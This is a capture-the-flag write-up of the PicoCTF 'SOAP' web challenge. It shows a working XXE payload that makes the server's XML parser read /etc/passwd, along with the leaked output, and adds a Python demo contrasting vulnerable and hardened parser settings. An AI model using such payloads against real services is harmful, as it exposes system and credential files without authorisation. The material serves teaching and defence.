PicoCTF — Write-Up

SOAP

Category: Web Exploitation
Points: n/a
Author: Kelvin Creighton
Difficulty: Medium
Tags: #burpsuite #web #xxe #soap
01

Research

What is SOAP (Simple Object Access Protocol)?

  • A protocol used for exchanging information in web services and computer networks.
  • Allows applications running on different OSs and languages to communicate over HTTP or SMTP.
  • SOAP messages are formatted in XML, making them platform and language independent.

SOAP Message Structure

  • Envelope: Defines the start and end of the message.
  • Header: (Optional) Contains metadata, such as authentication info.
  • Body: Contains the main message or request/response payload.
  • Fault: (Optional) Provides error information.
02

Information Gathering

The goal of the challenge, as described, is to read the `/etc/passwd` file. This points toward a Local File Inclusion (LFI) or XML External Entity (XXE) vulnerability on a Unix/Linux system.

STEP 01: Intercepting Traffic

Using Burp Suite to intercept traffic, we observe the outgoing and incoming requests involving an XML payload.

INPUT:
<?xml version="1.0" encoding="UTF-8"?>
<data>
  <ID>1</ID>
</data>

OUTPUT:
<strong>Special Info:::::</strong> University in Kigali, Rwanda offereing MSECE, MSIT and MS EAI

Reason: The application takes XML input (the `ID` element), parses it server-side, and reflects content back based on that ID. Since the server parses attacker-supplied XML and nothing indicates that DTD or external entity processing is disabled, it may be vulnerable to XXE (XML External Entity) Injection.

03

Creating the Payload

We can construct an XXE payload to instruct the XML parser to fetch the contents of a local file on the server.

STEP 01: Crafting the XXE Payload

INPUT:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ELEMENT data ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <ID>&xxe;</ID>
</data>

OUTPUT:
root:x:0:0:root:/root:/bin/bash ... [Flag Content Displayed]

Reason: `<!DOCTYPE data [...]>` opens an inline Document Type Definition (DTD). Inside it, `<!ENTITY xxe SYSTEM "file:///etc/passwd">` declares an external entity `xxe` whose content is read from the local `/etc/passwd` file. When the parser expands the `&xxe;` reference inside the `ID` tags, it substitutes the file contents, which the application then reflects back in its response, exposing the flag.

04

Key Takeaways

  • Always disable external entity (and, where possible, DTD) processing in XML parsers to prevent XXE vulnerabilities.
  • XML-based protocols such as SOAP carry this risk whenever the parser's security features, in particular external entity resolution, are not configured correctly.
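Added example, not part of this write-up or of the challenge's own code: the same `<data><ID>` message from the write-up, carrying the DOCTYPE/ENTITY construction, is parsed twice with Python's stdlib `xml.sax` (expat), once with external general entities enabled, which reproduces the challenge's behaviour, and once with them disabled, which is the hardened setting the takeaway calls for. The target file is a constructed temporary file standing in for `/etc/passwd`, and `build_request`, `IdHandler`, `extract_id` and `demo` are names chosen for this example.

```python
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import feature_external_ges

def build_request(file_uri):
    """The challenge's <data><ID> message carrying the write-up's DOCTYPE/ENTITY trick."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE data [<!ELEMENT data ANY><!ENTITY xxe SYSTEM "{file_uri}">]>'
        "<data><ID>&xxe;</ID></data>"
    ).encode()

class IdHandler(xml.sax.ContentHandler):
    """Collects the text inside <ID>, i.e. the value the service would look up."""
    def __init__(self):
        super().__init__()
        self._in_id, self.id_text = False, []
    def startElement(self, name, attrs):
        if name == "ID":
            self._in_id = True
    def endElement(self, name):
        if name == "ID":
            self._in_id = False
    def characters(self, content):
        if self._in_id:
            self.id_text.append(content)

def extract_id(xml_bytes, resolve_external_entities):
    """Return the <ID> text. True reproduces the challenge's misconfiguration (expat
    follows SYSTEM entities and inlines the file); False is the hardened setting."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = IdHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.id_text)

def demo():
    """Parse one payload both ways; returns (vulnerable_result, hardened_result)."""
    # Constructed stand-in for /etc/passwd so the demo never reads real system files.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash")
    try:
        payload = build_request(Path(f.name).as_uri())
        return extract_id(payload, True), extract_id(payload, False)
    finally:
        os.unlink(f.name)
```

With entities resolved, the `ID` value becomes the file's contents; with them disabled, the reference expands to nothing and the application only ever sees an empty `ID`.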
FF

Flag

Captured Flag
[REDACTED]
Kelvin Creighton — PicoCTF Write-Up
All steps performed in a legal CTF environment.